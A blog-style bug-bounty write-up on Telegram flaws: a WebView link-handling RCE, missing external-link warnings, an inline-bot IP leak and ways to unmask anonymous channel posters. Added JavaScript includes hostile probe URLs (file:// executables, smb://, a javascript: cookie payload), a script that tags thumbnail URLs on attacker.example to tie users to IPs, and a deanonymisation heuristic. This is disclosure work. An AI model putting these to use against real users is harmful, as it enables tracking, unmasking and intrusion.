Telegram bug bounties: RCE, privacy issues, and more…

Davide
Apr 21

Summary

  • RCE via WebView (May 2022)
  • WebK and WebZ, no warning appears when opening external links (May 2021)
  • IP leak Telegram Web (old version) (May 2021)
  • Leak users behind anonymous channel posts (December 2021)

Intro

In Italy we have pizza, pasta, and people looking for bugs. Today I want to talk about some bugs we have found in Telegram over the years.

  • Davide
  • A friend who prefers to remain anonymous

RCE via WebView

Introduction

Telegram ships an update every month, and the month Web Apps for bots came out we immediately tested the new feature on the various clients Telegram offers. We were able to run any executable already present on the computer simply by opening a site inside the WebView.

Web Apps for Bots

Telegram recently introduced Web Apps for Bots (https://telegram.org/blog/notifications-bots#bot-revolution), which embeds a browser inside Telegram. What could possibly go wrong?

On the day of the release itself we created a bot and implemented the new functionality so that a site would open in the WebView. We started with something very simple: opening links with protocols other than http, such as file://, sftp://, ssh:// and smb://, using the various methods JavaScript provides, such as window.location.replace() and window.open(). To our surprise, after a short time we found ourselves able to execute a file locally.

Exactly one hour after we started reading the documentation we had found an RCE: with a few lines of JavaScript it was possible to open any executable already present on a Windows 10 computer.

Testing the exploit on multiple platforms

This was all great, and it was time to test the exploit on multiple clients and different operating systems.

On Android and iOS we did some testing, but nothing happened: the mobile apps are much more limited than a traditional desktop environment.

We tried on Linux: no result, nothing opened. We tried on Windows 11: nothing there either. On Windows 7, on the other hand, it worked.

Unfortunately the source code had not yet been released, so we did not know why it worked on Windows 10 and 7 but not on 11. Luckily, a few days after the release the source code was updated too.

And so we discovered that Edge Chromium (WebView2) was used on Windows 11, while EdgeHTML was used on Windows 10 and lower.
A few days after our report, Telegram fixed it by checking that external links use only http[s] and by removing EdgeHTML.
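The fix described above, as an added example that is not Telegram's code: a scheme allow-list between the WebView and the operating system, run against the kinds of URL we tried. Every host, path and file name in the probe list is constructed for this example; `launch` stands in for whatever platform call opens a URL with its registered handler.

```javascript
// Added example, not Telegram's code. It models the fix the post describes:
// a bot WebView may hand a link to the operating system only when the scheme
// is http or https. The probe list reproduces the kinds of URL the post says
// were tried; every host, path and file name in it is constructed.

// URLs a malicious Web App page could pass to window.open() or
// window.location.replace(). Only the first two should ever reach the OS.
const PROBES = [
  "https://example.com/webapp",
  "http://example.com/legacy",
  "file:///C:/Windows/System32/calc.exe", // local executable, the post's case
  "file:///C:/Tools/http-toolkit.exe",    // "http" in the file name
  "calculator:",                          // Windows URI scheme handler
  "smb://fileserver.example/share",       // outbound SMB connection
  "ssh://user@host.example",
  "sftp://host.example/file",
  "javascript:alert(document.cookie)",
  "\\\\fileserver.example\\share\\x.exe", // UNC path, not a URL at all
];

// A check that looks plausible but is wrong: "does it mention http?"
function naiveLooksLikeHttp(href) {
  return String(href).toLowerCase().includes("http");
}

// The right check: parse with the WHATWG URL parser and compare the scheme
// exactly. Anything that does not parse is rejected, not guessed at.
function isAllowedExternalUrl(href) {
  let url;
  try {
    url = new URL(String(href).trim());
  } catch (e) {
    return false; // relative paths, UNC paths, garbage
  }
  return url.protocol === "http:" || url.protocol === "https:";
}

// Gate between the WebView and the OS. `launch` stands in for the platform
// call that opens a URL with its registered handler (e.g. ShellExecute).
function openExternalLink(href, launch) {
  if (!isAllowedExternalUrl(href)) return false;
  launch(href);
  return true;
}

// Runs every probe through both checks and reports what each would let out.
function runProbes(probes = PROBES) {
  const naive = probes.filter(naiveLooksLikeHttp);
  const handedToOs = [];
  for (const p of probes) openExternalLink(p, (h) => handedToOs.push(h));
  return { naive, handedToOs };
}

if (typeof require !== "undefined" && require.main === module) {
  const { naive, handedToOs } = runProbes();
  console.log("substring check would allow:", naive);
  console.log("scheme allow-list hands to OS:", handedToOs);
}
```

The substring check lets through a file:// URL whose file name happens to contain "http"; the parser-based check hands only the two http(s) probes to the OS and rejects the UNC path outright because it is not a URL.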

Then we tried it on macOS, and to our surprise it worked not only on the tdesktop client, which is the one that runs on Windows, macOS and Linux, but also on the macOS-specific client, Telegram Swift.
Several months after the feature was released, they finally published the updated source of the macOS client.

Trying to improve the exploit

Okay, the exploit worked on Windows 7, Windows 10 and macOS. Now what?

Opening already installed programs wasn't enough for us; we wanted to do more. But we couldn't even run something Telegram Desktop had automatically downloaded into the Downloads folder, because we couldn't learn the user's name and environment variables were not expanded in the path.

We tried passing additional parameters to cmd to take control of the machine, but again without success.

We were able, however, to open links using other protocols: calculator: opened the calculator on Windows, and smb:// and ssh:// worked too, but you couldn't do much with them. Perhaps the outbound SMB connection could have been abused (for example for NTLM hash capture or a pass-the-hash style attack), but we didn't test it since that was not our goal.

Also, on macOS a prompt asked the user for permission before anything could run, so again, nothing really exploitable.

In short, an RCE was found with a simple window.open(), but unfortunately, or perhaps I should say fortunately, it is not very useful without being chained with other exploits.

Conclusion

We reported the problem to the Telegram team; it was acknowledged and fixed, and the WebView on Windows and macOS is now more secure.

WebK and WebZ, no warning appears when opening external links

There is not much to say about this bug: the two new Telegram web clients simply opened links without alerting the user that they were leaving Telegram, so a phishing attack would have been much easier to carry out, especially since they are web clients.
On all the other clients, even the old web client, a popup warns you first.
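The decision the missing warning should have been based on, as an added example (not the code of WebK, WebZ or any other Telegram client): classify a clicked link as internal, external, or blocked, and when it is external build a warning that names the real destination. The domain list is my own choice and the sample links are constructed.

```javascript
// Added example, not code from WebK or WebZ. It shows the decision a web client
// should make before following a link: open it silently when it stays inside
// Telegram, otherwise show the user the real destination first. The domain
// list is this example's choice; the sample links are constructed.

const TELEGRAM_HOSTS = ["telegram.org", "telegram.me", "t.me"];

// Exact-or-subdomain match. A bare endsWith("telegram.org") would accept
// "evil-telegram.org"; a startsWith("t.me") would accept "t.me.attacker.example".
function isTelegramHost(hostname) {
  const h = String(hostname).toLowerCase().replace(/\.$/, ""); // drop trailing dot
  return TELEGRAM_HOSTS.some((d) => h === d || h.endsWith("." + d));
}

// Decide what to do with a clicked link. `shownText` is the visible anchor
// text: a text_link entity can show one URL while pointing at another.
function classifyLink(href, shownText = "") {
  let url;
  try {
    url = new URL(String(href).trim());
  } catch (e) {
    return { action: "block", reason: "unparseable" };
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return { action: "block", reason: "scheme " + url.protocol };
  }
  if (isTelegramHost(url.hostname)) {
    return { action: "open", reason: "telegram domain" };
  }
  const result = {
    action: "confirm",
    target: url.hostname,
    message: "This link will take you to " + url.hostname + " (" + url.href + "). Open it?",
  };
  // Extra flag when the visible text itself looks like a URL on another host.
  let shownHost = null;
  try {
    shownHost = new URL(String(shownText).trim()).hostname;
  } catch (e) {
    shownHost = null;
  }
  if (shownHost && shownHost !== url.hostname) result.mismatch = shownHost;
  return result;
}
```

Lookalike hosts such as evil-telegram.org or t.me.attacker.example fall into the confirm branch, and a link whose visible text is a telegram.org URL but whose target is elsewhere is flagged with the host the user was shown, so the dialog can say so.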

IP leak (old) Telegram Web

Intro

Through the old web client it is possible to get a person's IP address by having them use an inline bot.

Discovery

Many years ago there was a bug in Telegram that allowed an inline bot to obtain a user's IP address: the client downloaded the result thumbnail directly from the URL supplied by the bot, while the full-resolution photo was proxied through Telegram's servers.
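What the bot operator's side of that leak looks like, as an added example that is not code from the post: the bot answers an inline query with a thumbnail URL on a host it controls, and a web-server log line later shows the fetch arriving from the user's own address. Tying each fetch to a user with a per-user token in the thumbnail URL is this example's assumption; the host, user ids and log lines are constructed, and the result field names follow the Bot API's InlineQueryResultPhoto.

```javascript
// Added example, not code from the post. A bot operator only sees the leak the
// post describes if each thumbnail fetch can be tied to the user who caused it;
// the per-user token in the thumbnail URL below is this example's assumption,
// as are the host, the user ids and the access-log lines. Result field names
// follow the Bot API's InlineQueryResultPhoto (photo_url, thumbnail_url).

const OPERATOR_HOST = "https://attacker.example"; // constructed
const tokenToUser = new Map(); // thumbnail token -> Telegram user id

// Build the results for answerInlineQuery. On the old web client the browser
// fetched thumbnail_url itself, so that request arrived from the user's own IP,
// while photo_url was fetched through Telegram's servers.
function buildInlineResults(inlineQuery) {
  const token = "t" + inlineQuery.from.id.toString(36) + "-" + inlineQuery.id;
  tokenToUser.set(token, inlineQuery.from.id);
  return [
    {
      type: "photo",
      id: inlineQuery.id + "-0",
      photo_url: OPERATOR_HOST + "/full/cat.jpg",
      thumbnail_url: OPERATOR_HOST + "/thumb/" + token + ".jpg",
    },
  ];
}

// Match one common-log-format line from the operator's web server and map the
// tokenised thumbnail request back to {userId, ip}. Other requests give null.
const THUMB_LOG = /^(\S+) \S+ \S+ \[[^\]]+\] "GET \/thumb\/(t[0-9a-z]+-\d+)\.jpg HTTP\/[\d.]+" \d{3}/;
function attributeFetch(logLine) {
  const m = THUMB_LOG.exec(logLine);
  if (!m) return null;
  const userId = tokenToUser.get(m[2]);
  return userId === undefined ? null : { userId, ip: m[1] };
}

// Constructed inline_query update and web-server log (RFC 5737 test addresses).
const SAMPLE_QUERY = {
  id: "4190412513426389176",
  from: { id: 123456789, is_bot: false, first_name: "Alice" },
  query: "cat",
  offset: "",
};
const SAMPLE_LOG = [
  '203.0.113.7 - - [12/May/2021:10:01:02 +0000] "GET /thumb/t21i3v9-4190412513426389176.jpg HTTP/1.1" 200 1234',
  '198.51.100.9 - - [12/May/2021:10:01:03 +0000] "GET /full/cat.jpg HTTP/1.1" 200 98765',
];

// Answer the query, then see which log line betrays the user's address.
function demo() {
  const results = buildInlineResults(SAMPLE_QUERY);
  const leaks = SAMPLE_LOG.map(attributeFetch).filter((x) => x !== null);
  return { thumbnailUrl: results[0].thumbnail_url, leaks };
}
```

Only the tokenised thumbnail request is attributable; the full-size fetch in the second log line comes from a different address and carries no token, which is exactly the difference between a proxied and an unproxied download.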

It was a bug discovered by I don't know whom; it was well known around the various Telegram groups. I reported it to Telegram volunteer support (and not directly to security@telegram.org) a long time ago. Almost every client had this bug, and I wasn't paid for it: back then I didn't even think about asking if there was a bounty, plus I hadn't discovered the bug myself, I had only managed to reproduce it.

Years later I tried it again and, apparently, it was never fixed on Telegram Web, or it was reintroduced by mistake. This time I decided to report it by email to security.

They confirmed the bug and paid a bounty; however, as the client is now deprecated, it has not been fixed. Simply don't use the old Telegram web client!
But if you're really sure you want to try the old client, I won't be the one to stop you, so here's the link: https://web.telegram.org/?legacy=1

Leak users behind anonymous channel posts

There are several ways to figure out which user is behind a channel posting in a group.
Some of these methods also work with anonymous admins.

1. Using an inline bot
Even just opening an inline bot for a moment (for example by pressing a button with switch_inline_query and choosing a chat) tells the bot which user used it. Obviously, to be sure it was the anonymous user, you need them to send a message with that inline bot.
Alternatively, make sure no one else is using the bot.

2. Users who viewed the message
This method only works with users who write as a channel, not with anonymous admins: just open the menu to see the users who have viewed the message.
Obviously you can't be sure in this case, since you may already see users from the chat list.
But it can help figure out who owns the channel.

3. Pressing a button of a bot (the inline buttons, those attached to the message)
By pressing an inline button the bot receives all the user's info; it works both for anonymous admins and for writing as a channel.
To understand who the anonymous admin is, take the list of users of the group and wait for a user who is not in that list to press the button.
Again you can't be 100% sure, since you might have false positives, but in some borderline cases you might work it out.

4. Without internet and restarting the app (Android)
The messages are all sent as normal (that is, as the user), but the client shows them as if I had sent them as a channel.

Steps to reproduce:
- Set the primary user to write in the chat
- Go offline
- Set the channel to write in the chat
- Send messages
- Set the primary user to write in the chat
- Close the app
- Open the app

5. Game bot (like @gamee)
The score with your name is shown if you are posting as a channel and playing.
This does not happen for anonymous admins.
I have not had the chance to test what data the bot receives, but I imagine it receives all the user data in both cases, in addition to the IP address.

6. Join a group call
This only works for writing as a channel, not for anonymous admins.

7. Change the group photo or pin a message
The service notification appears with the user's name.
This only works for writing as a channel, not for anonymous admins.

8. Poll
There is not much to say in this case: if a user votes in a non-anonymous poll, you will see them among the voters.
It is a very simple thing, but a user may not think about it, and the app does not protect them in any way while they believe they are anonymous.

I understand that half of these things are almost irrelevant and are so by design; however, by calling them "anonymous", a person expects to be more protected. A warning before taking certain actions (even if it only appears once) would be a good solution,
as already happens in secret chats, which warn you before using an inline bot.
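Why methods 1 and 3 above work, shown on constructed Bot API updates as an added example (not code from the post): a message posted as a channel or by an anonymous admin reaches the bot with `sender_chat` set and only a placeholder in `from`, while inline_query and callback_query updates always carry the real user in `from`. The ids, names and group member list below are constructed, and the candidate heuristic is the post's own method 3, with its false positives.

```javascript
// Added example, not code from the post. On constructed Bot API updates it
// shows why methods 1 and 3 above work: a message posted as a channel or by an
// anonymous admin arrives with `sender_chat` set and a placeholder `from`,
// while inline_query and callback_query updates always carry the real user in
// `from`. Ids, names and the member list are constructed.

// Who really sent this update? masked=true means the bot only sees the chat.
function senderOfUpdate(update) {
  if (update.message) {
    const m = update.message;
    if (m.sender_chat) {
      return { masked: true, asChat: m.sender_chat.id, userId: null };
    }
    return { masked: false, asChat: null, userId: m.from.id };
  }
  const direct = update.callback_query || update.inline_query || update.chosen_inline_result;
  if (direct && direct.from) {
    return { masked: false, asChat: null, userId: direct.from.id };
  }
  return null;
}

// Method 3's heuristic: a button press (or inline query) from a user who is not
// in the group's visible member list is a candidate for the anonymous admin.
// The result is a guess; the post itself warns about false positives.
function anonymousAdminCandidates(updates, visibleMemberIds) {
  const known = new Set(visibleMemberIds);
  const candidates = new Set();
  for (const u of updates) {
    const s = senderOfUpdate(u);
    if (s && !s.masked && !known.has(s.userId)) candidates.add(s.userId);
  }
  return [...candidates];
}

// Constructed updates: one post "as a channel", one button press, one inline query.
const SAMPLE_UPDATES = [
  {
    update_id: 1,
    message: {
      message_id: 10,
      chat: { id: -1001000000001, type: "supergroup", title: "Group" },
      from: { id: 1, is_bot: true, first_name: "Channel" }, // placeholder sender
      sender_chat: { id: -1001000000002, type: "channel", title: "Some Channel" },
      text: "hello from the channel",
    },
  },
  {
    update_id: 2,
    callback_query: { id: "c1", from: { id: 424242, is_bot: false, first_name: "Alice" }, data: "press" },
  },
  {
    update_id: 3,
    inline_query: { id: "q1", from: { id: 515151, is_bot: false, first_name: "Bob" }, query: "", offset: "" },
  },
];
const VISIBLE_MEMBERS = [424242, 636363]; // constructed group member list
```

The channel post yields no user id at all, which is the protection the "anonymous" label suggests; the button press and the inline query yield the real ids, and the one id not in the visible member list becomes the candidate.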

Conclusion

Some of these “bugs” were fixed by Telegram, but I never received a response.

I think Telegram should make a page on its site dedicated to the bug bounty, stating what they consider in scope and what they pay more for, as they have paid a lot in the past for bugs such as P2P calls being enabled by default and leaking the user's IP address (duh).

Want to read about other bugs?

Go take a look at our previous article:
Telegram bug bounties: XSS, privacy issues, official bot exploitation and more…
